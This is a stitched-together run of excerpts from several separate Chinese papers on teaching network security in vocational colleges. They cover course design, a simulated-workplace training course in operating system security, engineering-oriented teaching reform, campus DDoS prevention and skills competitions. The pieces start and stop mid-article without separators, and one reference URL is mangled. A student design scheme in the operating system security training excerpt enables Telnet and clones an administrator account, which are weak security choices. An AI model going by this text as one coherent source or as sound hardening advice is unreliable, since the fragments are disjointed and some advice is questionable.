以培養學生從事網絡構建、網絡管理與維護工作崗位所需的知識與技能為中心來組織教學。信息安全基礎的課程開發流程:市場調研與召開實踐專家研討會 確定相關職業崗位群的典型工作任務 歸納行動領域 行動領域轉換為學習領域 學習情境設計 學習子情境設計 課程教學資料建設 實際教學檢驗。為了保障課程與技術發展相一致,建議完成每個教學周期后,課程組均要依據以上課程開發流程對課程標準和課程內容進行修訂。
3 教學內容和組織
3.1 教學內容選取
根據當前網絡安全項目的規模,可將網絡安全防護客戶劃分為普通網絡用戶(ADSL接入)、中小型網絡和大型網絡,由此根據教學單元設計內容涉及信息安全基礎知識、信息系統安全體系、信息加密技術和網絡安全實用技術方面來確定網絡安全防護學習領域的學習情景如圖2。
3.2 教學內容子情境設計組織
(1)普通網絡用戶安全防護學習子情境設計如表1。
(2)中小型網絡安全防護學習子情境設計如表2。
(3)典型校園網全防護學習子情境設計如表3。
4 教學組織實施與重點難點
4.1 教學組織實施
在整個教學過程中,學生一般以小組的形式進行工作學習。在任務工作過程系統化設計情境學習中,要求每個小組選出一名同學擔當組長,組長的職責是負責全隊的組織協調,分配任務,組織討論,提交實踐報告,成果演示錄像呈現,給其他組員評分等。
在具體實施教學過程中,本課程組把基于工作過程教學模式中的六步行動過程總結為教學中的四個環節:任務明確、教師示范、學生實踐、展示評價。在這四個環節中,分別把握學生應該掌握的知識和任務,順利完成教學和對學生的訓練。
4.2 教學重點
普通網絡用戶安全防護方案的制定與實施:由教師首先講解并演示Windows XP的安全防護操作,學生先學后做;教師指導學生進行Vista安全防護方案的設計與實施,學生邊學邊做;教師組織學生自主進行Windows 7安全防護方案的設計與實施。
中小型典型網絡的安全防護方案的制定與實施:由教師講解典型網站安全防護方案的設計與實施,學生先學后做;教師指導學生進行典型網吧安全防護方案的設計與實施,學生邊學邊做;教師組織學生自主進行典型企業網絡安全防護方案的設計與實施。
4.3 教學難點
網絡安全防護工程方案的設計與實施:通過Windows XP、Vista、Windows 7、典型網站、典型網吧和典型企業網絡安全防護方案的設計與實施,掌握一般網絡安全防護方案的設計與實施。
5 課程考核標準與教學效果
6 教學隊伍
本課程教學團隊現授課教師有7人,專業學術帶頭1人,專職教師中副教授2人,講師3人,助教1人;其中具有碩士學位2人,在讀碩士3人,“雙師素質”教師達100%以上;網絡架構工程師1人共同實施;達到理論實踐的緊密結合,理論支撐實踐操作的提高,實踐技能驗證理論的指導。在教學活動中,教師和學生相互學習,共同提高。本課程在建設過程當中逐步形成了一支學歷、職稱結構合理、師資配置完善、梯隊建設良好、結構比例相對穩定的教學隊伍。
7 教學改革創新與努力方向
7.1 教學改革創新
本課程采用校企合作、“教-學-做”一體化的教學模式。由本院與藍盾股份有限公司緊密合作,組建藍盾信息安全實驗室,為“教-學-做”一體化教學提供了非常好的條件。
教學內容改革:教學內容與崗位工作內容的一致性。
本課程采用:模塊課程模式項目(任務)課程模式活動課程模式工作過程系統化課程模式。
考核方式的改革創新
評價依據:過程技能考核+筆試 摒棄了傳統的一卷考核方式,更加關注于學生的職業能力和職業素質的評價,創新性地采用了專業交流的方式,通過師生對專業問題面對面的探討來增強學生的學習動力,同時考查學生專業能力。
7.2 努力方向
完善教學課程內容,探索新的教學手段;建立題庫迎合學生考取認證;豐富項目案例資源不斷改進教學方法;進一步完善師資隊伍結構,培養并形成一支教學水平高、專兼結合的高素質教學隊伍。
8 結語
目前,職業教育正處于日新月異的課程改革過程中,努力提升高職教育教學理念,創新體制機制,突出實踐教學,深化課程改革,更新教學手段,課程說課作為現代高職教學改革的新課題、教學研究工作的新形式進一步彰顯實踐教學特色,必將成為推動我國高等職業教育發展的新動力。
參考文獻
[1] 穆惠英.高職《環境監測》課程說課設計.中國科教創新導刊,2008.11.
[2] 秦毅,齊欣.《平面處理技術》課程說課設計案例.電大理工,2011.3.
[3] 陳麗,伍善廣.高職高專《藥劑學》.海峽藥學,2011.23(8).
[4] 秦愛梅.高職院校《3dsmax》課程說課設計.計算機光盤軟件與應用,2012(12).
關鍵詞:操作系統安全;工作場景;實訓教學
高職院校課程改革是加強學校內涵建設的需要,但職業教育課程始終未能跳出學科體系的束縛,使之成為被簡化、被壓縮了的學科課程的翻版,嚴重制約了高職教育的發展。國家教育部組織相關行業、企業專家、生產一線的技術人員及職教專家,以相關行業人力資源需求預測為基本依據,以就業為導向,以能力為本位,按照工作流程和崗位需要共同開發了以“核心課程與訓練項目”為主要架構的教學指導方案,突破了職業教育以課程講授和原理驗證為主的傳統教學模式,充分考慮到用人單位的需求,贏得了行業、企業的認可和支持[1-2]。
在“操作系統安全實訓”課程的教學過程中,學生以小組形式模擬一個項目組,在類工廠的實訓室中,將系統安全規劃設計開發過程和工作情景引入課堂,使學生在近似于實際工作過程的情景下,扮演相關角色,完成相關任務。充分培養了學生的系統規劃設計能力、團隊合作能力、工程應用能力[2]。通過工作場景模擬實訓課程的思想,在工作環境中開闊了學生視野,鍛煉了學生的團隊意識和工作意識,為今后走上實際工作崗位、開發項目積累經歷和經驗,為教師綜合評價學生提供了依據。
1工作場景模擬教學法
1.1教學法的內涵和特征
工作場景模擬教學法[3]是在教學過程中,使用一種近似于實際工作的真實場景,模擬工作中可能發生的真實事件,再現工作真實過程的情景和環境,讓學生按照工作流程,在各工作場景中扮演接近真實身份的角色,通過場景中的一些情節,體驗和理解其扮演角色的作用、工作內容等,從而理解教學內容,達到“寓教于景”教學目的的教學方法。
工作場景模擬教學法由以下幾個特征:1)實踐性強。能為學生提供一個接近真實的工作場景,在工作環境中體驗學習,將理論知識和實際操作應用于項目,在工作中能充分表現自己的才能,發揮創新潛能,從而增強對實際問題的預測與處理能力。2)動態性強。在教學中,學生是活動的主體,教師只起組織指導作用。3)交互性強。表現在學生之間對項目規劃討論,學生與教師的主動交流,有利于知識的傳遞和思想的集中。4)協作性強。項目由小組共同完成,有利于創設和諧的學習氛圍,培養學生團隊合作能力。
1.2教學法的迫切性
目前,社會及用人單位對學生動手實踐能力要求高,希望學生一畢業就能夠上崗完成實際開發任務。一些學校為適應這種需求,盡量送學生去企業或相關單位實訓,但這種實訓往往因為條件限制、人為因素等不能滿足所有學生。而在課堂上完成實訓任務,按照傳統的教學模式,教師出題目、提要求,最后進行檢查,學生不能很好地體驗實際項目開發的規則、制度、過程、管理和規范,與實際的工作場景嚴重脫節。
2操作系統安全實訓課程設計與組織
在實際項目開發中,項目組經常會采用封閉式集中開發的形式,便于學生今后能夠在實際崗位中適應這種形式的工作。在考勤上模擬工作考勤制度,學生實訓時間從下午3點到晚上9點,中間有1小時休息時間,下午3點上課前利用電腦上的聯創系統實行實名簽到制度,模擬工作中的上班打卡,晚到學生要根據遲到時間長短扣除相應平時出勤分數,模擬工作中扣除工資和獎金;工作時間嚴格控制學生出入次數和時間;嚴格控制網絡,只允許項目組長上網,對外網信息的上傳進行控制最大不超過1M,不允許使用優盤等存儲設備(防止公司信息外泄);晚上9點同樣模擬工作場景,嚴格控制下班時間。看似很殘酷的考核制度,實際上是讓學生真正體會職場的嚴格制度和工作艱辛。具體教學過程設計如圖1所示。
1) 第1階段。
根據實際情況以5~6人為單位進行分組,成立項目組推選出組長(項目經理),成立以教師為領導、各項目經理為成員的臨時評審團。同時,教師公布事先準備好的幾個公司的項目需求(以類似于招標書的形式于內網服務器)供學生選擇(圖2給出其中1個中型企業的項目需求)。
公司背景:
紹興XX公司是一家年產值上億的中型企業,總部在紹興市區,有多家子公司分布在上虞、諸暨等地,公司網絡曾經發生過幾次網絡安全事件,給公司帶來了一些經濟損失,公司決定增加網絡安全投入,提高網絡安全管理水平。
具體需求:
1. 用一個虛擬機模擬公司總部,一個虛擬機(或者是主機)模擬子公司或外地出差人員。
2. 總部和子公司需要使用VPN通信(為了保證信息的安全防止中間人攻擊,采用IPSEC來保證隧道的安全性)。
3. 公司總部的Web、Ftp等服務器對內網用戶開放。
4. 公司內部不同部門不同職位所具有的權限不一樣。
圖2某中型企業的需求
項目組根據所學的操作系統安全和局域網組建知識及本組的實際情況,選擇一個合適的需求,收集信息,共同討論,分析規劃,撰寫項目設計初步方案和匯報PPT,最后寫出相應的投標書。在指定時間,由各小組派代表介紹自己的項目規劃,接受評審團的提問(記錄相關信息并給出成績),由評審團投票決定是否通過,若落選,重新選題,否則公布結果(包括第1階段的成績)。
2) 第2階段。
項目組提出設計方案,圖3給出某項目組對上述需求的設計方案,然后制定項目計劃,再由項目經理對項目進行劃分(提交教師審核),最后下發任務給項目成員。在實訓室中盡可能的模擬真實的工作環境和條件,完成項目設計方案的內容,測試人員同步跟進,及時記錄測試清單,教師巡回指導,碰到共性問題集中講解,包括對部分理論知識的講解。在開發過程中嚴格控制工作進度,各小組“下班”前,提交每天的開發日志(模板如圖4),明確當天的進度完成程度,如未按計劃完成則給出理由和解決方法。項目經理按時向教師匯報小組情況,以便教師掌握項目的實施進度。項目實施完成后,小組之間進行交叉測試,檢查是否全部實現項目所要求的內容及其實用性、可操作性、效率等,并及時進行修正。最后,撰寫竣工報告和項目匯報的PPT。
某小組作為網絡安全公司,為該中型企業設計的安全管理方案,實現以下安全要求:
1. 子公司可以通過IPSEC安全方式構建VPN隧道技術。
2. 為了防止黑客通過445端口在局域網中輕松訪問各種共享文件夾或共享打印機,故在總部關閉445端口,開始開啟TELNET服務。
3. 公司總部為經理、技術總監、普通員工,分配不同權限的賬號,經理具有管理員權限,是管理員組的一員;技術總監是和普通員工都是普通賬號;公司改革,經理兼任技術總監,故希望技術總監賬號克隆經理賬號,共享其所有權限。為了節約磁盤空間,對普通用戶設置磁盤配額,每人只能使用350M的空間,超過200M發出警告,而所有普通員工自己增加的文件和文件夾都要用EFS加密,并導出其密鑰。
4. 公司規定所有賬號都不得采用弱密碼,開啟復雜性要求、設置最小密碼長度為6、密碼最長留存期為30天。
5. 公司為了實現信息公開化,信息共享,創建了Web、Ftp兩個服務器,并設置了DNS,方便域名訪問。對于Web站點公司希望實現一個站點對應兩個IP地址(因為公司地址將有電信、網通的,而暫時只有電信的,為了防止環路,要求在同一張網卡下配置多個IP地址),同時希望隧道用戶才能訪問站點,并限制帶寬為5M,連接數為50。同時Ftp服務器實現匿名訪問,只允許隧道用戶訪問,限制連接數量為25,要求能讀寫。
圖3某中型企業的設計方案
項目名稱 組號
項目組成員
時間 地點
時間段
每名同學的工作內容
01 02 03 04
是否完成
進度
遇到的問題及解決方法
工作心得
參考資料
圖4項目開發日志
3) 第3階段。
各小組向全班同學介紹演示自己的項目,隨時接受班級同學提問,分享項目開發經驗。評審團按照學
生提交的工作成果,參照項目進度計劃和項目需求,確認總結學生的階段工作成果。教師對小組的整體設計以及在實訓中的問題進行評析,公布相應成績。最后由學生和老師共同評選出最佳項目組。
3教師在模擬過程中的作用
在整個工作情景模擬過程中,教師的位置應處于輔助地位,學生是主角,教師協助各開發小組完成實訓任務。
1) 明確角色和任務。引導每個學生明確自己的角色和任務,提醒和引導學生成功扮演相應角色,起到一個導演的作用。
2) 跟蹤監控工作過程。跟蹤項目規劃設計實施的全過程,通過旁聽討論會、檢查記錄,及組長的進度匯報來監控小組的方向;檢查開發日志監管系統質量和進度;檢查考勤情況,監控遵守和執行規章制度的情況;通過評審監控最終系統的效果和質量。
3) 指導和幫助。在第1階段,負責為學生提供各種文獻資料或查閱文獻資料的途徑,幫助學生制定調查問卷和討論主題,提供規劃設計及投標書的規范說明,并根據討論會記錄和需求規格說明,給出建議和意見。在第2階段,幫助解決學生未能解決的問題。在第3階段,幫助學生規范測試過程和測試報告的書寫,參與評審答辯,幫助學生完善系統功能和性能。
4) 評價。觀察每個學生在工作過程中的表現,包括出勤、工作態度、參與情況、工作量,通過評審其所負責部分的系統設計和開發質量,以及各階段的小組成績,給出每個學生的總體評價或總評成績。
4結語
工作場景模擬教學法應用于操作系統安全實訓課程,是對實訓課程的科學改革。該方法既有利于課程目標的實現,又使學生角色扮演中,體驗到真實項目實施的工作過程、工作場景和相關制度、規則及規范,讓學生對未來職場有感性的認識和了解,為走上IT工作崗位做實戰準備。
參考文獻:
[1] 姜大源. 當代德國職業教育主流教學思想研究:理論、實踐與創新[M]. 北京:清華大學出版社,2007:50-100.
[2] 錢宇虹. 基于工作過程的高職軟件項目開發綜合實訓開發探索[J]. 計算機教育,2008(20):175-178.
[3] 閆樂林,蔡平勝,元萊濱. 場景模擬教學法在“計算機網絡”課程中的應用研究[J]. 計算機教育,2009(18):116-118.
[4] 柴巧葉. 基于“中小型網絡構建與管理”的項目教學的探索與實踐[J]. 計算機教育,2009(22):132-134.
Research on Operating System Security Training Based on Working Scenario Teaching
DU Huan-qiang, YUAN Si-da, CHEN Jun
(Department of Computer Science, Zhejiang Industry Polytechnic College, Shaoxing 312000, China)
一、計算機網絡專業面向工程的教學改革思路
針對不同階段的實驗教學確定不同的任務定位。院定必修課著眼于提高學生的科學素質與人文素養,以培養學生的基本實驗技能、科學的思維能力和創新意識為主要教學目標。系定必修課和專業方向課及實踐教學著眼于對學生進行工程技術人員的基本訓練,以培養工程實踐能力和創造能力為主要教學目標。
針對傳統的專業實驗課與工程嚴重脫節的狀況,實行專業實驗課的工程化,即系定必修課程及實驗課要面向工程,要緊緊圍繞工程和聯系工程進行。
針對傳統的專業實驗基本都是驗證性實驗的狀況,增設綜合性、設計性和創新性實驗,以培養學生的創新能力和綜合實踐能力。
針對傳統的專業實驗課從屬于理論課的狀況,實行獨立設置的實訓課程和單獨考核。在進入畢業實習前,進行一次網絡工程綜合實訓,這一獨立設置的實訓課程名為網絡集成技術,它涉及網絡技術的所有方面,并可通過專業實驗室實施。
針對高等職業院校只局限于校內教學活動的情況,實施“走出去、請進來”的面向工程的授課方式,加強校內外實習實踐基地建設。
二、計算機網絡專業面向工程的實踐教學體系
建立面向工程的實踐教學體系是一個復雜的系統工程。該體系包含三個部分:課程體系及內容、網絡實踐體系(實驗、實訓和實習)、網絡工程應用。在該體系中,要始終以網絡工程應用為最終目標,建立課程體系、整合課程內容,設置層次網絡實踐體系;課程體系及內容服從、服務于網絡實踐;網絡實踐容服從、服務于網絡工程應用。
1.建立面向工程的課程體系
從應用型人才培養的全局來看,當前課程改革的主要任務是重新審定、合理調整總的課程設置。在計算機網絡專業中,減少專業必修課,按照計算機網絡、網絡工程、網絡管理與安全和網絡軟件開發4個方向增加選修課。明確每門課程在培養計劃中的地位與作用,增加綜合素質養成需要的宏觀性課程,充實新興的高科技應用成果。
課程改革不僅要以就業崗位群對人才知識結構的要求為依據,建立模塊化的課程體系,而且要改革課程內容設置,打破課程的界限,根據高職計算機網絡教學的實際,進行課程內容的整合與拆分,提高課程教學的效果和質量。
調整網絡專業系定必修課和實驗課的教學方式,將實驗、實訓、實習等實踐性課程與理論教學有機統一起來,面向工程應用實施教學計劃,重點突出知識的應用性和實踐性。
2.建立面向工程的網絡實踐體系
面向工程的實踐教學體系包括實驗、實訓和實習三個部分。實驗基于網絡基礎理論知識,進行基本技能的培養。實訓主要鍛煉學生對網絡工程的整體規劃、設計和創新能力。實習要求學生走出校園進入企業鍛煉,在實際網絡工程項目實踐中進行鍛煉,總結經驗、教訓,提高綜合設計創新能力。其中,實驗是工程實訓的基礎,實訓又是實習的基礎,這三者之間關系是逐層深入的,從而形成了系統而有層次的實踐教學體系。
(1)實驗項目的設計。按照實驗教學方式,實驗教學分為以下幾種形式:驗證性實驗、綜合性實驗、設計性實驗和研究創新性實驗。過去在教學過程中,多以驗證性實驗項目為主,各任課教師需要進一步優化設計課程實驗方案,適當精簡驗證性實驗,增加綜合性實驗和設計性實驗比重。實驗教學做到精講多練。
(2)實訓項目的設計。在本專業“計算機網絡”、“網絡工程”、“網絡管理與安全”和“網絡軟件開發”等多門課程學習的基礎上,增加了“計算機網絡工程綜合實訓”這門課程,通過2個專業實踐周完成。目的是將所學的網絡基礎知識結合實際網絡工程項目要求進行系統性的訓練。實訓業務參照各行業信息化規范、企業用人標準和崗位要求,從職業道德和職業技能兩方面強化學生的能力培養,其培養目標涵蓋:項目經理、網絡架構設計師、網絡施工員、網絡維護員、網絡管理員和信息安全師等。計算機網絡綜合實訓的內容包括:工作組級局域網設計與應用;校園網的規劃與設計;校園網站建設維護;電子商務平臺建設維護;企業構建IP電話系統。
(3)網絡工程實習。實施“走出去、請進來”的面向工程的授課方式。建立校企培養模式,使學生即學即用,了解網絡技術及施工特點和規范,激發學生的學習興趣,達到了傳統教學方式所不及的效果。同時,聘請一批網絡工程和網絡開發第一線的工程技術人員,定期到校進行課程教學和開設講座,讓學生了解到網絡技術新發展、新工藝,通過講課和講座,提高學生對專業實踐能力的重視程度。
3.面向工程的網絡實驗、實訓平臺的設計
面向工程的網絡實驗、實訓平臺應提供真實的網絡環境,可以讓學生親自動手完成實驗實訓項目,加深對網絡原理、協議、標準的認識,從而提高學生的網絡技能和實戰能力。因此,網絡實驗實訓平臺的建設尤為重要。根據實驗臺功能的不同,分為基礎實驗臺、安全試驗臺、無線試驗臺和VoIP實驗臺。每種試驗臺由實驗需要的硬件組成,包括路由器、核心交換機、三層交換機、二層交換機、防火墻、工作站、服務器、無線AP、VoIP語音模塊等。該環境有很強的適應性,根據不同的實驗實訓要求,可以配置不同的基礎平臺,如軟件開發平臺可以直接提供路由和DNS環境,網絡安全實驗臺則可提供完全的Internet技術環境。該平臺可以實現計算機網絡、網絡工程、網絡管理與安全和網絡軟件開發4個方向的所有實驗實訓項目。實現了理論的實驗化、實驗的工程化、工程的系統化、系統的集成化。
4.實驗、實訓成績考核與效果評價
關鍵詞:校園網;DDoS;防范;措施
中圖分類號:TP393 文獻標識碼:A 文章編號:1009-3044(2014)20-4716-02
Campus Network DDoS Attack Prevention Measures
ZENG Xiao-jie1 ;ZHOU Zai-hong2
(1.Loudi Vocational & Technical College, Loudi 417000,China;2.Guangdong Medical College, Dongguan 523808,China)
Abstract: The campus network in Colleges and universities because of some inherent problems of its own development, make it vulnerable to the attack of various security threats such as DDoS etc.. In this paper, the author through the observation and analysis of the campus network for many years, the campus network DDoS attack prevention measures, and achieved good results.
Key words: campus network; DDoS; prevention; measures
近年來,高校教育信息化出現迅猛發展的態勢,高校校園網出現了新的建設,新設備、新技術不斷涌現。可是,由于網絡的開放性以及日益泛濫的病毒和攻擊工具,校園網的安全問題日益凸顯,如計算機病毒、拒絕服務、網絡漏洞、網絡資源濫用等校園網絡事件不斷出現。分布式拒絕服務攻擊(Distributed Denial of Service―DDoS) 是互聯網安全的嚴重威脅[1],在校園網內也時有發生,對校園網造成了很大的后果,嚴重影響了學校正常的教學、科研、管理工作的順利開展。該文從校園網安全狀況的角度,分析了DDoS攻擊方式和簡單判定方法,并總結了校園網防范DDoS攻擊的一般性措施。
1 校園網絡安全現狀
高校校園網絡的建設,一般建成了核心、匯聚、接入三個網絡結構層次,核心節點間的互聯鏈路,核心節點與匯聚節點間的互聯鏈路以及匯聚節點的設備間組成的網絡為骨干層,其他部分為接入層。高校校園網核心層和匯聚層一般采用了Cisco、H3C、華為、銳捷等主流廠商的高端設備。各種安全設備也大量使用,如IPS,流量檢測清洗設備、防DDoS防火墻等。校園網管理部門則負責校園網的建設,包括規劃、設計、實施以及業務維護。這樣的網絡結構和設施使對加強校園網絡安全有了較好地基礎,但校園網在網絡安全上有獨特的特點,這些特點決定了校園網會受到來自于學校內外的各種網絡安全問題的威脅[2]:
1) 校園網硬件設施投入大,用戶數多,一旦出現網絡安全問題,在校園網絡中會迅速蔓延,后果嚴重。但校園網的建設和管理通常對網絡安全重視不夠,管理投入明顯不足,這樣就造成了對校園網絡安全管控的力不從心。
2) 校園網中的應用系統軟件盜版嚴重,存在網絡安全漏洞, 如木馬和后門等,給校園網絡安全造成很大隱患,網絡入侵就乘虛而入。
3) 來自校園網內的安全威脅不容忽視。大學生這一活躍的用戶群體好奇心強,特別是對黑客技術感興趣,經常嘗試使用各種黑客技術進行惡作劇般的網絡攻擊,這些出于好奇的非惡意攻擊,是對校園網安全的很大的考驗。
4) 由于校園網開放的網絡環境決定了校園網絡的管理也是寬松的。為保障校園網絡資源的充分共享及應用的方便,校園網絡中一般不會有過多的網絡限制措施,甚至校園網中各種安全技術及措施也沒有進行有效的配合,安全設備設施不能發揮其最大的作用。
由此可見,校園網從管理和應用上存在很多的問題,這些問題的存在使校園網絡受到DDoS攻擊越來越容易。
2 判斷校園網DDoS攻擊的簡單方法
DDoS攻擊也稱之為“洪水攻擊”, 它利用TCP/IP協議的漏洞,通常采用幾百臺甚至幾千臺分布的主機并發地對單個或多個目標進行攻擊,消耗目標主機或目標網絡的資源,從而干擾或完全阻止為合法用戶提供服務[3]。
針對校園網絡安全獨有特點,校園網DDoS攻擊一般表現出兩種形式:流量型的DDOS攻擊和資源耗盡型的DDoS攻擊[4]。在攻擊發生時,對校園網絡帶寬或主機,利用大量的DDoS攻擊數據包致辭使網絡帶寬被阻塞,或消耗主機的內存,或占用CPU應用程序,從而無法提供正常的網絡服務。
在校園網內,如何判斷主機服務器是否遭受 DDoS攻擊呢?可以從主機CPU使用率、內存、網絡流量、網絡速度等方面的變化來判定主機是否遭受了DDoS攻擊。如一臺主機出現明顯超出該網絡正常工作時的極限通信流量的現象且持續時間較長,這就表明存在DDoS攻擊的通信。另外如主機出現不屬于正常連接通信的TCP和UDP數據包,如出現特大型的ICP和UDP數據包。還有如主機服務器接入網絡,但不能操作,或訪問速度非常慢,斷網則正常,或重啟主機服務器也能恢復,則說明遭受了DDoS攻擊。
如要進一步確認主機服務器是否遭受了DDoS攻擊,有一種簡單的測試方法,就是用Ping命令來測試。若對主機突然Ping不通了或丟包嚴重,則可能遭受了DDoS流量攻擊,還可以Ping連接在同一交換機上的主機服務器,若也不能正常訪問,就基本可以斷定該主機遭受了DDoS流量攻擊。而對于校園網內的資源耗盡型DDoS攻擊的判斷則更簡單,如Ping主機時突然發現主機訪問很慢甚至不能訪問了,但還可以Ping通,則很可能遭受了資源耗盡型DDoS攻擊。還有Ping自己的主機不能Ping通或嚴重丟包,但Ping同一交換機上的其它主機服務器則正常,這就說明主機遭受DDoS攻擊后而占用主機CPU,造成主機無法回應Ping命令。這種情況下,網絡帶寬還是有的,否則就Ping不通同一交換機上的其它主機了。
3 DDoS攻擊防范措施
校園網要防御DDoS攻擊,要從校園網絡設施、網絡安全策略設置及網絡管理等多方面考慮其防范措施。
1) 校園網硬件方面。首先是從網絡結構上要設置合理。校園網一般采用核心、匯聚、接入三個網絡結構層次,重要應用系統應設置成中立區。采用V L A N 技術對校園網進行針對性的劃分,如劃分為學生區、教學區、宿舍區、實訓區等,并根據各子網的安全保密程度進行合理分布,防止局部安全性較低的網絡系統造成的威脅傳播到整個網絡系統,這種結構為實施DDoS攻擊檢測提供了良好地基礎。其次是采用高性能的網絡系統設備和安全設備。設置防火墻,充分發揮防火墻的過濾、NAT轉換、安全訪問控制、漏洞防范等功能和防DDoS攻擊屬性,有效地防止DDoS攻擊的入侵。設置IPS即入侵防御系統。IPS入侵防御系統是一種主動式的安全防護設備,在不影響網絡性能的情況下發現非法的入侵行為,對來自網絡內外的DDoS攻擊行為進行實時保護。Cisco、H3C、華為等主流設備廠商均有很好的網絡與安全設備,這些設備對DDoS攻擊的策略設置是采用WEB界面方式進行設置的,方便簡單。可以使IPS和防火墻的安全策略相互配合,防范DDoS攻擊的效果更加明顯。再次要有充足的網絡帶寬。帶寬越大,防DDoS攻擊能力越強。
2) 網絡安全策略設置方面。首先設置校園網用戶身份認證。設置校園網用戶身份認證機制,建立相應的身份認證系統或統一的身份認證平臺,防止對網絡資源的非授權訪問以及越權操作,這對防范非法DDoS入侵的效果明顯。其次設置訪問控制。訪問控制是網絡安全防范和保護的主要策略,主要任務是讓網絡資源不被非法使用和非正常訪問,校園網絡訪問控制策略是防范DDoS攻擊的重要措施。再次加強系統優化。要確保服務器的系統文件是最新的版本,并及時更新系統補丁和過濾軟件,關閉一些不必要的服務。通過修改注冊表來減弱DDoS的攻擊能力,如減少生存時間、防止SYN洪水攻擊、限制同時打開的SYN半連接數目、縮短SYN半連接的time out 時間、禁止C$、D$、ADMIN$、IPC$等缺省共享[5]。
3) 網絡管理方面。首先要有健全安全管理體制,有一支技術合格、高度負責的校園網絡安全管理維護隊伍,要加強相關人員的技術培訓,要有相應的網絡安全問題應急處理方案。其次要定期地對網絡及應用系統進行安全檢查及備份,做好日志記錄。再次要加強校園網用戶的安全意識,加強病毒防范,防止木馬入侵,經常進行系統升級更新。
我校在校園網的日常安全管理上想了很多辦法,如經常使用ping命令和netstat一an命令對網絡進行測試,檢測網絡服務器訪問情況等。對網絡安全設備的安全策略進行調試,以適應網絡應用系統的變化。通過采取一系列措施后, 對DDoS攻擊行為達到了較好地防御目的。
參考文獻:
[1] 黑客解密攻擊方法,闡述如何防御攻擊.中國經濟網httP:///cysc/tech/i tsh/200803/03/t20080303_14706816.shtml,2008.3.
[2] 金忠偉.黑龍江畜牧獸醫職業學院校園網安全體系建設[D].哈爾濱理工大學,2007:3-4.
[3] Felix Lau, Stuart H.Rubin, Michael H.Smith et al.Distributed denial of service attacks. In:IEEE International Conference on Systems, Man, and Cybernetics. Nashville, October 2000, Pages: 2275-2280.
一、職業技能競賽對實踐教學的促進作用
2014年《國務院關于加快發展現代職業教育的決定》中就提出“推進人才培養模式創新。堅持校企合作、工學結合,強化教學、學習、實訓相融合的教育教學活動。……開展職業技能競賽。”2016年全國職業院校技能大賽中職組的“網絡搭建與應用”賽項規程也明確了競賽內容,是“通過對計算機網絡和集成企業進行調研和分析,根據行業企業業務背景進行網絡業務需求分析、技術應用環境分析、理解實際的工程應用與業務架構分析。中職計算機網絡專業畢業生主要從事系統集成、系統應用、網絡工程、網絡安全及售后技術支持等五個崗位,競賽內容即崗位工作主要內容”。由此可見,計算機網絡專業的學習內容就是中職畢業生今后要主要從事的工作,要和企業需求形成無縫對接。在廣西壯族自治區,無論是學生層面還是在教師層面,“網絡搭建與應用”項目都是職業技能大賽中的常設項目。該項目不但能很好地檢驗學生的技能水平,也檢驗教師的技能水平及指導能力。職業技能競賽與日常實踐教學結合,不僅能激發學生的學習熱情,提高學生的實踐動手能力,也能幫助學校建設“雙師型”教師隊伍,提高技能教學質量,從而使“以賽促學、以賽促教”成為真正有效的教學手段。
二、實施過程中遇到的問題
職業技能競賽與實踐教學能無縫結合是理想的狀態,但筆者學校在計算機網絡專業教學實施過程中發現,真正做到“將實踐課程改革與技能競賽相結合,汲取技能競賽的內容和標準對實踐課程進行及時更新、轉化、提升”,是實踐教學中的技術難點。具體表現在以下幾個方面。1.受益面小,難以惠及全體學生參加“網絡搭建與應用”項目技能競賽的學生僅是幾個人,他們擁有更多的訓練機會。該項目的技術性較強,不容易學懂。賽前,指導教師都會對參加競賽的學生進行一對一的輔導,在指導過程中參賽學生所遇到的無論是理論上還是技術上的問題是必須解決的,這也使得指導教師會比在教學上花更多的時間對學生進行指導。而對其他學生,任課教師所花費的時間將會少一些,也沒那么多的精力去指導每一位學生,難以做到讓每一位學生都能很好地掌握所學技能。因此,真正受益的學生不多,絕大部分學生得到的實訓機會也僅限于課程安排的實訓。2.實踐教學難點滲透率低,易產生兩極分化現象大多數中職生有厭學情緒,存在“理論不重要,會操作就行”的認識誤區。然而對于計算機網絡專業而言,理論知識是實踐操作的必要支持。由于專業知識較難理解,教師在實踐教學中結合了技能競賽的內容難點進行教學指導,不少學生的學習積極性仍然不強,覺得“聽不懂”“看不懂”。學生的實踐操作能力直接決定專業人才的培養質量。3.專業教師難以兼顧日常教學和競賽指導“網絡搭建與應用”競賽項目需要的是整體的相互配合,稍有錯就很難進行下去。不少學校計算機網絡專業的教師都是身兼日常教學和競賽培訓兩項工作,在技能大賽的準備階段,參賽選手通常都是選擇在晚自習時間、周末雙休日甚至是寒暑假備賽,這要求專業教師付出更多的業余時間來指導選手。而且競賽內容常更新,要求指導教師也要與時俱進,不斷學習新的知識點,這也是很費時費力的工作。因此許多教師為了兼顧日常教學,常常回避參賽指導。4.實踐教學的教材不適用于日常教學市面上的計算機網絡專業教材和大綱在相當一段時間內內容是相對不變的,這就容易與市場的反饋和企業的需求脫節。計算機網絡專業知識和技術應用的更新是日新月異的,僅靠教材難以與時俱進。在實踐體系改革嘗試階段,筆者學校先后采用了清華大學出版社《交換路由實用配置技術》與機械工業出版社《路由型與交換型互聯網基礎(第3版)》作為教材。前者理論部分較為詳細,但實訓部分是基于思科設備的,職業技能競賽選用的設備卻是神州數碼的。筆者學校網絡實驗室主要的實訓設備也是神州數碼,因此教材不適用于設備。而后者雖然實訓部分是基于神州數碼設備的,但理論部分或過于晦澀,或過于簡單,也不適用于日常教學。
三、經驗總結
1.融合競賽,設計適合學校自身特點的實踐實訓內容要解決受惠面積小的問題,讓非參賽學生也能受益于職業技能競賽,以滿足企業的需求,學生的實訓任務就需要具有很強的工程實踐性。這就要求在設計課程實訓內容時,了解學生已掌握的專業基礎知識,結合技能競賽內容的關鍵知識點,參考企業對人才的知識需求,結合教學內容以及實訓設備,設計相關實訓任務。例如大賽中可變長的子網掩碼(VLSM)的劃分,這是一個即使在教師賽中都很容易出錯的部分。目前很多中職網絡課程教材并不提及VLSM,但其又是網絡工程一個很基礎的理論知識點。對于“子網規劃”的實訓內容,為使學生理解為何需要VLSM,教師們自己設計了典型案例,采用場景教學法,以一個實際的網絡工程設計作為背景來說明為何要節約IP地址空間、減少路由表大小,讓非參賽的學生也能系統地學習計算機網絡的一些關鍵技術。2.優化實踐教學的教學評價模式要避免學生兩極分化,就要修改并優化評價系統,讓評價系統來調動學生的學習積極性。“網絡搭建與應用”項目是一個團體競賽,將技能競賽的評分標準引入到實踐教學的考核環節,可以直接對學生的實踐能力、表達溝通能力和團隊合作精神進行考核。具體考核學生網絡部署、網絡設備操作、服務器系統的管理等實際操作能力,合理設置其所占學生成績比重,比如:學生評價=50%日常教學評價+50%期末考核評價。日常教學評價主